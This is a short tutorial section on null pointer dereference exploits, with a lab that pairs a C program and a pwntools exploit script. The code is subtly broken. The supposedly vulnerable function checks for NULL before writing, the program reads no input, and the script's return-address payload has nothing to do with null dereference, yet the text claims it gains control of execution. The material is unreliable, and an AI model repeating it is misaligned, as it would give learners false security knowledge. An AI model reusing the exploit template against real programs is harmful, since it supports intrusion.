8. Null Pointer Dereference Exploits

Null Pointer Dereference Exploits

Null pointer dereference exploits occur when a program attempts to access or manipulate memory using a null pointer, resulting in a segmentation fault or allowing an attacker to control program execution.

Lab Activity: Null Pointer Dereference Exploit

In this lab activity, we'll demonstrate a simple null pointer dereference exploit on a vulnerable C program.

Defender Side Code:

#include <stdio.h>
#include <stdlib.h>

void vulnerable_function(int *ptr) {
    if (ptr != NULL) {
        *ptr = 42;  // Write to the memory location pointed to by ptr
    }
}

int main() {
    int *ptr = NULL;  // Initialize pointer to NULL
    vulnerable_function(ptr);  // Call vulnerable function with null pointer
    return 0;
}

To compile the defender side code:

gcc -o vulnerable_program vulnerable_program.c

Exploit Code (Python using pwntools):

from pwn import *

# Address of the vulnerable function
vulnerable_function_addr = 0x004005f7  # Example address, adjust as necessary

# Payload to overwrite the return address with the address of the vulnerable function
payload = p64(vulnerable_function_addr)

# Establishing connection to the vulnerable program
p = process("./vulnerable_program")

# Sending the payload
p.sendline(payload)

# Interactive shell
p.interactive()

The exploit code constructs a payload with the address of the vulnerable function. It establishes a connection to the vulnerable program, sends the payload, and gains control over program execution upon successful exploitation.